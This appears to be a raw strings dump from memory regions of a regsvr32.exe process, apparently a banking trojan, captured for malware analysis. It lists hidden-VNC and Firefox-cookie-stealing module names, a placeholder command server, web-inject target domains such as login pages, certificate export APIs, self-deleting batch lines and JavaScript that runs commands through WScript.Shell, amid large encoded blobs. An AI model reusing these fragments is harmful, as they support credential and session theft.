C2WAtSKZol6vKAbpi0JDfpAwb9eAx60GySErBYDPFQ9hV3OljxOyq9UBEM7OJk5Aot0tIA1CGT/TCL/Vw1eo6OBnKsvR2JwX5jtOhDXdZhbnLwIkjd8RNGb5Or93MOW7B2hKPfdUco6zV0CD GBCjois1LL6loZ33mdpD8QLjmSEjX0/DL iWQ9IThcbkpRV Z7qGXywNr4r4/WCNuOhUdugAlxgkLBloP2ipBDB7QYyEtUGgH0RAmE9n9dAqB6knCSFBq3L6G2EEv4CWMS6DrR8HgXt1rr10mz9JtQ2PQarG7zMxWyQG21w9uyT7EVBX0nir8Em95NT7X8HStIfGYMPIJ7xRUHkdxTx1pjFxzQWOVJcvKa5w5gpA1Xov1wrHpdWD8VCTFAkBfv6EfxUVSGGb OLa  MIsuuFY/WMhOOjwsujPMZPJFSW2Y7j2SkgtkTZ1FeXEraT6BPM7U zzi5szN0vXyzFMvIo5Uu3QUtJltqCVCohBgY7/cZ4po1gxL/va0HsYcxv6YwPJJq231t4rXLJ4hEOJTz6mvJMMrKz YdO2V/8UuI/pTD9KAcgsxdDp3oZfJbpfx6IsM7eT4F4LNHw695TSM/EgyiIV581yI4nPHNJfxYJ3aXrKI/3oIfmjG5gTZoe2McS7IyDT73KBBL wXfPBKnSRgaxj K0wDIqHpjJaK27UUZG3flQM8RX4q6hgjJQAqMhZIVJC0Z 7Dqg W9gui9 BPwTi Bqco9TXX1ju293YfVWajIe0 8BnvnmJTS7gXqFAa1mfLcZdM5cNsSj9nMiIS2FHcOHeeP2JHy5f6msa9r8wDpSmetJ1Guhf/C2rJjqA1EiQOJR4KXy2JsQtn7ahmRbDcY G6YukhUP0gjCjRqtEU8rs2S4RcsoHfAdO3UQGzwcST73Hohg6n6bH5Cu4obOlXvg0rdvbOw c6cCdEDHeWh0CwfWaSI/SslwL70DERLEDhjXDKdOxSgGBeryK0W75m2KDjcseqV9wxpZADM2II2XjrMCEMtQk29iUS9b7S2FBU0ncF3XHjttNqI5R2UimjOo57C2ESUqn3wK/uP490uI0 7Knr4OD5qc95H8/8eJz7CuIEx882f9Yd6goaCtChnBv8rzwUeH86vGTG4bmRKOX5H9ztPQHDO3hox1rmLXrgZTotKRmtyAS7MrB0pjZdQxu3vRyEsyLDy2YBQv5/y6ZSlRTI6oOhJO2C4c0pkOfdLrvRwAm2nHagci47ExA5k0xvoqK8mXydCQkOZGRJHon9SYqoVthUvfRwAxWXA6zllWTNb 8W8aXHc8YGcqpAQxuzLvTQZwW8C3/N DKFK3YyXVo54wu/Oo/LtmaZ0OVNKovH4LoOJSyLuqOmF4da2wdbd77pp2r5XYBc ri7Zsv6i makju6nos7WqQ/Fo9hG2tQGHoHz6srqQ7B0L3IKlvePezzzcwvn6qQE4Z5 yiNA wRJjVJSrGVBploFCMCA7VJYsAOUIr3FkxwmWYd K7d4f8ara5D20P2vzQoSY//YOLNyQWbRdcmie/jm8 tkLoO9qkJ Si4Q/rhOb229XRmnZmkv87KPDRLK5P5Kdl 1Gh0f7yRCGMQWlAnzmIzSWl6ufjKsy4OHw Ibg4fapFDoByZKKUxMyFFp1o2SuA/H6O5bu0GRvqoVpCNbSMRqVB7cRO8wM0/emO7ftHvENtuW9oujk85  Jjhu0zrH6iEIVxZm9cojZMHUd2B WJfdOdPhNO710 x2l8hXOaqLDguLjZsgHlYR0M6IxlfJvivhj5MHOTRT1y4uxyTTlYgZFGyMXDgAKB2jXI3Cty0vZUTp5Q9PNpbLSoZGc/zw4/TpKWXyzfAHlkkibwotw2OYzUOgtbggg4jpmlBoT2JOao1ctkr2d3UBmAy8XpvspvnBX/xvpdRL/1QMys=lRCPASX27nuqqN0rPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADD"
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1
66006666
"c:\docume~1\"%CurrentUserName%"\locals~1\temp\tmpf7521b9d\bindata865.exe" path<<c:\docume~1\"%CurrentUserName%"\locals~1\temp\tmpf7521b9d\bindata865.exe>>path inj_ffile<<:2:>>inj_ffile

regsvr32.exe_3264_rwx_00070000_00047000:

.text
`.data
.reloc
update.exe
config.bin
%0&!%F
?)500>(8
7-52&<&,
,%)4.5(";$2
:'$!71689/
-0=).?,7
60/)4:5<
-*?)2<3:
>5;(4-2>)4 }744
"?5&"5%3%/
398>7="'
;!)5:. =##
Z#%xDVOE
(00(7> <$>59<&=3 =
$6>59$=1
^EXKSQN_^%X Sf
PR_OpenTCPSocket
%s%s%s
gdiplus.dll
GdiplusShutdown
ole32.dll
gdi32.dll
value=[%s], code=[%s]
HTTP/1.1
HTTP/1.0
hXXps://
GET /favicon.ico HTTP/1.1
HTTP/1.
X-WebKit-CSP
hXXp://VVV.google.com/webhp
%COMMANDSERVER%
hXXp://127.0.0.1:%u/
X-Type: %s
_getFirefoxCookie
hXXp://
atmos_hvnc.module
atmos_ffcookie.module
atmos_video.module
userenv.dll
del "%s"
if exist "%s" goto d
del /F "%s"
Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; SV1)
urlmon.dll
cabinet.dll
hXXp://xxxxxxxx.com/xxxx/xxxx.php
%s, u %s %u u:u:u GMT
; charset=%s
HTTP/1.1 %u %s
Date: %s
Content-Length: %u
Expires: %s
Content-Type: %s%s
ID: %s
value_%s
value_%s_%s
%s = "%s";
*.facebook.com
*.twitter.com
*.instagram.com
*.booking.com
*.sharepoint.com
*.yahoo.com
login.yahoo.com
*.google.com
accounts.google.com
192.168.*.*
127.0.0.1
*/wp-login.php*
*.xn--p1ai
Cookie: %s
Referer: %s
Accept: %s
Accept-Language: %s
Accept-Encoding: %s
SSSh8
9.tI3
CreatePipe
GetWindowsDirectoryW
GetProcessHeap
KERNEL32.dll
GetKeyboardState
MsgWaitForMultipleObjects
ExitWindowsEx
USER32.dll
RegCreateKeyW
RegEnumKeyW
RegQueryInfoKeyW
RegCloseKey
RegCreateKeyExW
RegOpenKeyExW
RegEnumKeyExW
ADVAPI32.dll
UrlUnescapeA
SHDeleteKeyW
PathIsURLW
SHLWAPI.dll
ShellExecuteW
ShellExecuteExW
SHELL32.dll
Secur32.dll
GDI32.dll
WS2_32.dll
PFXImportCertStore
CertDeleteCertificateFromStore
CertOpenSystemStoreW
CertCloseStore
CertEnumCertificatesInStore
CertDuplicateCertificateContext
PFXExportCertStoreEx
CRYPT32.dll
HttpSendRequestExA
HttpQueryInfoA
HttpSendRequestExW
HttpSendRequestW
HttpOpenRequestA
HttpOpenRequestW
HttpEndRequestA
HttpSendRequestA
HttpEndRequestW
GetUrlCacheEntryInfoW
HttpAddRequestHeadersW
HttpAddRequestHeadersA
InternetCrackUrlA
InternetCrackUrlW
WININET.dll
OLEAUT32.dll
NETAPI32.dll
VERSION.dll
NtQueryKey
ntdll.dll
PSSSSSSh
SSSh4
SUWt^Ht[Ht.Huc
2!242:2?2[2
Chrome
Firefox
nnspr4.dll
nss3.dll
chrome.dll
Process (u minute): %s
Input: %s
X-TS-Rule-Name: %s
X-TS-Rule-PatternID: %u
X-TS-BotID: %s
X-TS-Domain: %s
X-TS-SessionID: %s
Content-Type: application/x-www-form-urlencoded
X-TS-Header-Cookie: %S
X-TS-Header-Referer: %S
X-TS-Header-AcceptEncoding: %S
X-TS-Header-AcceptLanguage: %S
X-TS-Header-UserAgent: %S
kernel32.dll
Global\XXX
Company: %s
Product: %s
Version: %s
Software\Microsoft\Windows\CurrentVersion\Uninstall
%u: %s | %s | %s
%sd1%
%sd2%
Name: %s
Path: %s
Hash: %s
Time: u.u.u
\StringFileInfo\xx\%s
"%s" %s
/c "%s"
%sx.%s
%sx
SELECT * FROM %s
Rapport
sXXXX
d*.swf
*.flv
*.png
*.jpg
*.ico
*.gif
*.css
%Documents and Settings%\%current user%\Application Data\Uccyemuzput\odobdima.xia
%Documents and Settings%\%current user%\Application Data\Uccyemuzput
odobdima.xia
%Documents and Settings%\%current user%\Application Data\Felaytzyymes\zaodxiibaru.ilb
%Documents and Settings%\%current user%\Application Data\Felaytzyymes
zaodxiibaru.ilb
%Documents and Settings%\%current user%\Application Data

regsvr32.exe_3264_rwx_000D0000_000C0000:

.idata
.reloc
P.rsrc
Portions Copyright (c) 1983,99 Borland
kernel32.dll
Software\Microsoft\Windows NT\CurrentVersion
wininet.dll
user32.dll
ntdll.dll
Kernel32.dll
URLMON.DLL
Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.30729)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
PSAPI.dll
HTTP/1.1
Content-Type: application/x-www-form-urlencoded
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i  ){ els[i].play();}} catch(e){}
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i  ){ els[i].Play();}} catch(e){}
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i  ){ els[i].PLAY();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i  ){ els[i].play();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i  ){ els[i].Play();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i  ){ els[i].PLAY();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i  ){ els[i].playVideo();}} catch(e){}
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i  ){ els[i].playVideo();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i  ){ els[i].start();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i  ){ els[i].Start();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i  ){ els[i].START();}} catch(e){}
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i  ){ els[i].start();}} catch(e){}
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i  ){ els[i].Start();}} catch(e){}
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i  ){ els[i].START();}} catch(e){}
try {var els=document.getElementsByTagName('video'); for(var i=0;i<els.length;i  ){ els[i].play();}} catch(e){}
try {jwplayer().play()} catch(e){}
IWebBrowser
IWebBrowserApp4
IWebBrowser2l
.length;
 =String.fromCharCode(parseInt(
.substr(
,2),16));
 =String.fromCharCode(
,1).charCodeAt()^
,1).charCodeAt());
.length-1)?
=new ActiveXObject("WScript.Shell");
.Environment("Process"))("
.Run("
=new ActiveXObject("WScript.Shell");
.RegRead("
psapi.dll
HTTP/1.1
\\.\LCD
1234567890
Shell32.dll
\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones
0123456789
Mozilla
?456789:;<=
!"#$%&'()* ,-./0123
.text
`.rdata
@.pdata
KERNEL32.dll
@.reloc
222.dll
GetKeyboardType
advapi32.dll
RegOpenKeyExA
RegCloseKey
oleaut32.dll
RegOpenKeyExW
RegDeleteKeyW
RegCreateKeyW
RegCreateKeyA
version.dll
SetProcessWindowStation
OpenWindowStationA
EnumChildWindows
HttpSendRequestA
HttpOpenRequestA
FindNextUrlCacheEntryA
FindFirstUrlCacheEntryA
FindCloseUrlCache
DeleteUrlCacheEntry
ole32.dll
wsock32.dll
winmm.dll
atl.dll
wtsapi32.dll
Wtsapi32.dll
PSAPI.DLL
shell32.dll
ShellExecuteExW
NtQueryValueKey
NtDeleteValueKey
NtSetValueKey
urlmon.dll
UrlMkSetSessionOption
4"4,414?4
3,313[3`3
829<9]9~9
=.=3=[=`=
>!>&>7><>
7)707;7@7
= =$=,=_=
?0'101>1
: :&: :}:
?,?;?@?^?
8 8$8(8,808
c2h3PgXWqt2QzTRrb/AnQFC6SRUgWch7j77TVxtWrXEisi5gWjLIKgQWWPjhp0UgEz/kVUGNipnIPLZxi8BxUOwd9J5DQbsosxVqooPcMxy2MFTKpmT8aROKg4jgPL5ULF6ilWRorquC8m0XR dR8hd6QeMVN1z8qMkD1vqxgm4LrkB3rrUobN/saPP2hYsk6VQTT5huKnOMVL5caR5vadBp7OdRzhgDnQIi0zuYfIv v02VfY9J3rrQjqC1  pFYIFt3Gp4UAQmbDJLGUi8hvJ5jIHnHXh6ZdE G2FTkJ3CI2Lj2wf8fOmqGCNuCUBH6Ec7vvAylDcuOVeqr6H9 GqsS1IfkCCllztP/uhBjWjey5V SSDAqDhRCVH uTCvACRGgad bO9wKfoRWb20kkPK8CJRO3Cb3ZBKGOeh51oRkebuOLldMrwBX33FmSkln88u4JdiIX3EOwtJpJ8fNuFb9sVJKqbY0xHN8Kq1Or8RhXvuFhn9jvExwsg77Nm9pukUDgOKXK2YjwzI43i2jlgqjXRjPGNPPw8yrBpOYbuqtlz4xPvXSChtWkqlonwCNmHPfYIqUJsozXDoUSntJjEjPKcnSYnNd4VI/OTKRZl4s3QZK4AiriXs m2G8zO3JfYHA4Mzloj7x/ZrAhvhzeMKq4FLKRhJG4T2JXyLgwvQjwXdohUQg4iEYHpcny L36V4uUkFcvU1tvpqDtiOQYa70HHcPEJfYLV8Toym38KdYL9IJPqUdop utIX7HhaldlXLQIAz7PWZnlHKctlhe5qmCRh7GYrijRosE0KLIyPrqsKKjC7bEFYXy01KABfO qe1pH4Q6vjT2LIWDeAU0QF7cNTSc9IrXxuiKrH9fzzDBmL0r2uP90MTpzx4Q6QXF6LFGMM4bSQRJvDy82dHpceQb5 wSJiwXfI1q0lw2j7yeKKU4d1S2yu1KSDqXTy9EIbNA OTz83nYnlm92yC4Q C1WaY TFWNwLLReTWs1XYS 5ycpe2nbJMnH2nWskkuEycGRyOKeWv9mBEriqVlrPdTjCXGsosq0/ze tTOFwuJz2YC0fKpts4kJR9uU15hpCl3Ic9igp1oMS77Hpr/6MeMHu7DkBY7jRBBOMa8af3kOwdC7KHIoA3ugO6idmr2mNlnOIPZ02aJF4A7BUmGxq6fAc/d4nsDOKJhYVDSSQ7jFKn0BxkkeEXGn1jlhM30sWUYRiITZB4hz3dELYpaKpOauqQgZJXLMoJUZjswMZcIHw8 hQQZBbCiXHRvYT0LMALC4KzcYhBVimTnaCzF92A/IwjwmuMcLdSrwxeDl hgJ64QRn4shSxTV72EJEeStKbUWop6I3XrGwDJziks02zJZ8Ngv5XQj8/6DVvQGXFx4TWNeBjq bLTDVLKQUg0huyqGeRETme3vgtHptbc3HtKLcy0vfPN7ho3GliJnfIlnwhAqPHR5IA154JiYW0oM7LzXCvf1CKxpj1LiIrZnwB6d7Jtt3Q8QKx 0eOeMKVM0ssWxpfLZL071LCj9dr01FLINneXWUENh HrZMrHiIwMc1UdC1vKZBx pQDZ646bysxGLoBQGMRzGdjCDwvbbfEXBUrd/g9Fb8hisLCdrpwEdRSFKUJPqH3u0UM6aNat6SOaQC2KyCuj XpXuVQl42OBunYjp28FYnjJ69lTqmpbMzQlwbndruPKMFUzTs7exQHCtDnZmeknvkCEDf6KSkltgHq1kAC84KUjHejJtsRDuBx0 zeOZ7k1xdwTTZ6D09GDNmaScqIuJBvxivLT94S5LKC6lFbmV89F32bLDuyMgdZst/wMPHcFbzg05tfs7uTHFvQFFuOLpHnHSgPnuNioE97QtBFTp6b9JZbfpd2gx jCYIjC6 c jSeFFiVxYZXbEZZZwc/YdSdKleWp1mhPeQm3JVaKaTXHwATQyKbAA5StQDJ1vp7z0ktMKi6ccOlyToNIZKAtx2K5VhhYNCQuk3aOczite07juFnr4cqEWU3ExokG73gHNySThVIb7F4aSuWLuvjJBJIPKF40P9iC768a11KJFrEnBjefcP2wz/YSZVEB4nyEQ06n3xYDzUt/F2cZ5JjhDq88rEvlE24 rRGht8HZgCa5XNtR51BNuBt3pp2eW78aCwiOEI8VDbn7AruVqkZrQQyYiz6MehXkTK77WrmjXVq5vzgUt4Jzu0pRfZGETR3S5xfz5uV2giiqXE6lYyjuBM0jm2JNf nUn iN35Go8p0Li5fuLrpjddQ1dFuKdDNclSXqPKGbcZU125ad0veW6dcXfvAw/P9kMO8/TKTtnfOw8XBDk2xHFOeyXOK/91hTRYgWLfAdC40pzwnNwRaWu2Aaw/vVSJQ/gFTtm5GDHCSIcKgmANglVtydNm8YkauqtmguErNundREO/6Xo5XpIF3kajshYV/7KjUgwJi9iqoftmRJ94/Tnr70imCuitzO5r81yZ3k1z4U 9Me8weKT69PB2aJTIMhrak6AV 2frGulcO1ju8IPk7W8QOYSGWq cymI4z/Bz5J1hFhMdrMzlFpBMzPF5zagQCDIFZV1HxA/RIEJeOKSZ4Sh1I 9/BXsFpOpr2zx DNvJXmpvgC81f5ca1ECBLO/o23asth4rsaKfBTvd5V ATraypf 5cH1w0H28a4Eb/Ho1gl2smdg5cfdBCyocaFQDyIhrgvO7l5RCcuG3sdDcbJzIvOHqtH8pP0vLIc1VLyyMD3b7vBzGSOxGaKGHNKEu/tR524QME0URfvXsGZU8fGNDZ3DE10bOQXQowrs34DwRQV3hyjTDDars/0rORfN73HxM NtO/9LTyB1neFGw7bd2xFjJ2 3mCbtmCg8m3ZfOK05dJ4zWtSUplLfpExGp NvDcwcq6kkSmvNjPrOG3lzUOkNU5LFwX fTSCdGTCfQ N7KO1iQp/ daGpiDbXS 1MYRI956xhzL6PchxIYyRYVOWPUSHrfgnlyaWcxAMhaj03mV4zdJncZwfgv/Dp1uMJAS0hikYb4RZOGHA7dU9G9T9SKw3OKguTYyrTdA55njE7WjvmI4MENhf2qDHPZ9g1qUSFArRTPUCG7yzx1NnKVcWcY7HkEV0j 9CGlVGrJ1 MiBpVEqzDY0vUeOH275PySs/rqsXNDJpLbNDmE0lbRtaNaOy3a3Tqdhx7Jx0Z84NQ9dllnjga9w XIiFWm5OwD P3yTbjqWPOTitm6HJkdvvvlBcOQSs8xyA9/Dvi/Uq0 rvcAOzBFRMoXpegqOp4ABA3rVGt6ooxDsMypVtyWhxdVWhkVraQr uMTeCoYUzwKWcOAP1AemeqcpTP6gxooeAaaTiEWs1Zs6 iB9 lIvynIWBmiCIJPTRXStMLo0r/dEUj4CiHg45RQB2syBda9JjdY0XGYeCNCLbz1JIZ27UeD6bi2aM/5n3a9MMny52SDEyjfO7Fm/sgwJu9KyKQtZOsuBOAU3iF4mpGB7NSG9y4I1fUVKO/QPr/Ri5wmz Zni3fuAEWTwd03qfK8ywZK0b5lagpTXuDab20 x86fQueLed2rRyaNQHQ4A/K7LlV/wNztP1gOQWKd/XqmkNNTUA3YqcXgA7 fFh0DdaKIz3ux5YYm6WpoR IjvZI0DudKoBDT5vbcg7awPBaPHmiwNi7krMp/wRhFAQ51N3v214gjeaW1j6bMR3lA9SoI3D7f1UnUxeMVlpAi9NPSkr/bs3ww4vgTkH3mWPh6JMWUXZ9/JW9DUb44EbqU sZnH33VZYhTRXvzPbeM33RlQ5PN4a5junE3q9tDwTu/7TzGARQvjLcA OST6QkmSObIMuhwG29jbvnhbVkBoBF87U3y9At2usdlnDTqn4XpLgEzr7y2hW28IwB1IMTp9Lc6bs/CzxMTIhGomY3XuLHQwzR1JP47OS7oEmIqKqem/ZsWC1L6lxU8Ij7UPvlreS4ivFjOEkMFyOaba3a8HZ73Sz64k5kbCOaBgeIe73I3WYHege7t2AgsSmDfb mNbiqCpwT 8n/rYk/wFRgOhtF96FVrvKvvPQztLJTcWvQXDm8uncg auwcf KcNWpM5EsstUrJCnazVk28hDtvnVNw73zsmW6HORlfumWpVIqHmVaZ3GKzvu2/WkM9D76zHfFGxzSTmu/QY3v1nk3Z38ky 4FH5uyR0svcFUUmMICwF5 PubCdBq1XivsKGdcDKqwIagfL65CWPpHVBYhoPyPi/s1qIx5KPp/huaJWUkExnCC33e3S0XEoYM0ZtV6U08/fgJph0RqHyYg02Xf6Y3oM t5bEe2pKglGlExbApVTV6ZLKYKGPfbJuZQbAXCC5y8kZBk8efHtSk1OJqVXdBdu3xPesAqf5c8O5VK3gsoeZaEF0FCxBKj tz9vYZC02eQe6 suEpXVRAPmlwFByKUJyGIItA9 1hCBMuyNl sEz8p2qAH4aRiN3EeO3FcpPLwI3V4H6WVQOH2cR QoDJqfl1MzjOtbYnwZ2z2o j3EoDrkuN/dNQdwGlWXgYp2Ka4Dokjf N0l9jtdDeqcVIT7UnPxNobPutRirxsSJ2ykiPosbCuSmGJ2luJnNB2f544LQeD6Ywu5gBT7NC0CmN0zdiF//uq1mIzekizAnyOUYWpRppij5I9dhei3EuFxJKPvu9NohC121dVsh5GLiNcJ2rv2cLEjUiCN0mWy5nFaDe9yEG6Q4LUEw3h3spbcwkKgq3InOIXH5xyQL9R8ycznUoXgaMzAr/ISItqIw9JINdKxGL1  qjfEem6MYgVVsr/8choKvCW3007EyRqptoTDlADiu91orLcl0PbNb7BwNmfZYMYrAImr/ByyAPFLZO87xv/oBB pPVyNCJs p1FNOzmfv5NFa1bvC4f37nMbd9Udx/OikdZavj1wdDGzMX6oViwK VhwR r12DcYln6G6K0FiXQ7tHi5yP9RVPmiN76S1Vy2nlwA iOB3Pn9dU98LHhqob7bNx2VH7r 236DG4JEQj2rNOyrvDHeBZILrP8gpgQsyXAK/vkBtS6zefT5U985ibWtURWUNfHZ7CKJTgnao30Yvix7ONG9X55dsRcEJsMjn79ri1ggH4W1QbM5WFZMBPGSQDmCo6BJVEA0zw/H8OzA94G/meiuKtFGBET2kEJBXkiJ/Nj45RwF7GioMHDh2nVKeM9RtLi6QkyJY2F5p6JgfdOCy7Vb0zpCLzR/gTcI/SBE9fJEe2RdzbBEkIiIq/e5XXzdy5VE264JbYDhVUzkYqT5m5RvpQ1WaoYNLOogRS9kKjsthNMNbpWOOQIkjLaVTReY/CY S7dhLpEDz0n8gwdM2U/R8nu lECUYqEY2N5p3IRtfbkQ9BtlwlQBIFOblFccd1kks7s/p1tH9FyODzisTiaABwyIHBYjwJzod99fLPtGtDZ7wcJ 1TEaSyCWhxPcVqtsARsxgh8oGIM6Xyf9znVVg1pA4Ls5zfs/DfcZ7hLlvE6nzJh22z/9mdImznshhlPfIfcQ2rF97V9mikNxuGTNrfqHPJZPeBpwxJV5C918ybmhlPrOMKMJJmJKxJaM1i lyVp78eTRLF72u3n y3dEq5vOTbnCXE4gE61szPbjUc0NMmtPxnVrhoOajBwJyk7ozqJbZgxLPzF1gH0DvcrYPeUs/uFzXDlXwa/qB6C08bQDsH50J6UqQV67oX8HY4h28v49y7cUWUYt3Mcy8NznHD4clKGtsQJPldyCkekfi/tch9lmECxVI197U/93trIQrhvZKJtY c/pZlRliwqVhofXEh6c GUXPX1LEmI6YdIyElqCybGJFGlXYOTqNm3O4kuiUxZqPSmKBJ6QWuFIaJzSyZl Jg6uvi9mooC6CdqR Sx/PpLqV5cD7gnw66FcLDxTKXnvGFig9K/EVh cmYE/SWPl4i C2WAtSKZol6vKAbpi0JDfpAwb9eAx60GySErBYDPFQ9hV3OljxOyq9UBEM7OJk5Aot0tIA1CGT/TCL/Vw1eo6OBnKsvR2JwX5jtOhDXdZhbnLwIkjd8RNGb5Or93MOW7B2hKPfdUco6zV0CD GBCjois1LL6loZ33mdpD8QLjmSEjX0/DL iWQ9IThcbkpRV Z7qGXywNr4r4/WCNuOhUdugAlxgkLBloP2ipBDB7QYyEtUGgH0RAmE9n9dAqB6knCSFBq3L6G2EEv4CWMS6DrR8HgXt1rr10mz9JtQ2PQarG7zMxWyQG21w9uyT7EVBX0nir8Em95NT7X8HStIfGYMPIJ7xRUHkdxTx1pjFxzQWOVJcvKa5w5gpA1Xov1wrHpdWD8VCTFAkBfv6EfxUVSGGb OLa  MIsuuFY/WMhOOjwsujPMZPJFSW2Y7j2SkgtkTZ1FeXEraT6BPM7U zzi5szN0vXyzFMvIo5Uu3QUtJltqCVCohBgY7/cZ4po1gxL/va0HsYcxv6YwPJJq231t4rXLJ4hEOJTz6mvJMMrKz YdO2V/8UuI/pTD9KAcgsxdDp3oZfJbpfx6IsM7eT4F4LNHw695TSM/EgyiIV581yI4nPHNJfxYJ3aXrKI/3oIfmjG5gTZoe2McS7IyDT73KBBL wXfPBKnSRgaxj K0wDIqHpjJaK27UUZG3flQM8RX4q6hgjJQAqMhZIVJC0Z 7Dqg W9gui9 BPwTi Bqco9TXX1ju293YfVWajIe0 8BnvnmJTS7gXqFAa1mfLcZdM5cNsSj9nMiIS2FHcOHeeP2JHy5f6msa9r8wDpSmetJ1Guhf/C2rJjqA1EiQOJR4KXy2JsQtn7ahmRbDcY G6YukhUP0gjCjRqtEU8rs2S4RcsoHfAdO3UQGzwcST73Hohg6n6bH5Cu4obOlXvg0rdvbOw c6cCdEDHeWh0CwfWaSI/SslwL70DERLEDhjXDKdOxSgGBeryK0W75m2KDjcseqV9wxpZADM2II2XjrMCEMtQk29iUS9b7S2FBU0ncF3XHjttNqI5R2UimjOo57C2ESUqn3wK/uP490uI0 7Knr4OD5qc95H8/8eJz7CuIEx882f9Yd6goaCtChnBv8rzwUeH86vGTG4bmRKOX5H9ztPQHDO3hox1rmLXrgZTotKRmtyAS7MrB0pjZdQxu3vRyEsyLDy2YBQv5/y6ZSlRTI6oOhJO2C4c0pkOfdLrvRwAm2nHagci47ExA5k0xvoqK8mXydCQkOZGRJHon9SYqoVthUvfRwAxWXA6zllWTNb 8W8aXHc8YGcqpAQxuzLvTQZwW8C3/N DKFK3YyXVo54wu/Oo/LtmaZ0OVNKovH4LoOJSyLuqOmF4da2wdbd77pp2r5XYBc ri7Zsv6i makju6nos7WqQ/Fo9hG2tQGHoHz6srqQ7B0L3IKlvePezzzcwvn6qQE4Z5 yiNA wRJjVJSrGVBploFCMCA7VJYsAOUIr3FkxwmWYd K7d4f8ara5D20P2vzQoSY//YOLNyQWbRdcmie/jm8 tkLoO9qkJ Si4Q/rhOb229XRmnZmkv87KPDRLK5P5Kdl 1Gh0f7yRCGMQWlAnzmIzSWl6ufjKsy4OHw Ibg4fapFDoByZKKUxMyFFp1o2SuA/H6O5bu0GRvqoVpCNbSMRqVB7cRO8wM0/emO7ftHvENtuW9oujk85  Jjhu0zrH6iEIVxZm9cojZMHUd2B WJfdOdPhNO710 x2l8hXOaqLDguLjZsgHlYR0M6IxlfJvivhj5MHOTRT1y4uxyTTlYgZFGyMXDgAKB2jXI3Cty0vZUTp5Q9PNpbLSoZGc/zw4/TpKWXyzfAHlkkibwotw2OYzUOgtbggg4jpmlBoT2JOao1ctkr2d3UBmAy8XpvspvnBX/xvpdRL/1QMys=lRCPASX27nuqqN0rPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADD
c2h3PgXWqt2QzTRrb/AnQFC6SRUgWch7j77TVxtWrXEisi5gWjLIKgQWWPjhp0UgEz/kVUGNipnIPLZxi8BxUOwd9J5DQbsosxVqooPcMxy2MFTKpmT8aROKg4jgPL5ULF6ilWRorquC8m0XR dR8hd6QeMVN1z8qMkD1vqxgm4LrkB3rrUobN/saPP2hYsk6VQTT5huKnOMVL5caR5vadBp7OdRzhgDnQIi0zuYfIv v02VfY9J3rrQjqC1  pFYIFt3Gp4UAQmbDJLGUi8hvJ5jIHnHXh6ZdE G2FTkJ3CI2Lj2wf8fOmqGCNuCUBH6Ec7vvAylDcuOVeqr6H9 GqsS1IfkCCllztP/uhBjWjey5V SSDAqDhRCVH uTCvACRGgad bO9wKfoRWb20kkPK8CJRO3Cb3ZBKGOeh51oRkebuOLldMrwBX33FmSkln88u4JdiIX3EOwtJpJ8fNuFb9sVJKqbY0xHN8Kq1Or8RhXvuFhn9jvExwsg77Nm9pukUDgOKXK2YjwzI43i2jlgqjXRjPGNPPw8yrBpOYbuqtlz4xPvXSChtWkqlonwCNmHPfYIqUJsozXDoUSntJjEjPKcnSYnNd4VI/OTKRZl4s3QZK4AiriXs m2G8zO3JfYHA4Mzloj7x/ZrAhvhzeMKq4FLKRhJG4T2JXyLgwvQjwXdohUQg4iEYHpcny L36V4uUkFcvU1tvpqDtiOQYa70HHcPEJfYLV8Toym38KdYL9IJPqUdop utIX7HhaldlXLQIAz7PWZnlHKctlhe5qmCRh7GYrijRosE0KLIyPrqsKKjC7bEFYXy01KABfO qe1pH4Q6vjT2LIWDeAU0QF7cNTSc9IrXxuiKrH9fzzDBmL0r2uP90MTpzx4Q6QXF6LFGMM4bSQRJvDy82dHpceQb5 wSJiwXfI1q0lw2j7yeKKU4d1S2yu1KSDqXTy9EIbNA OTz83nYnlm92yC4Q C1WaY TFWNwLLReTWs1XYS 5ycpe2nbJMnH2nWskkuEycGRyOKeWv9mBEriqVlrPdTjCXGsosq0/ze 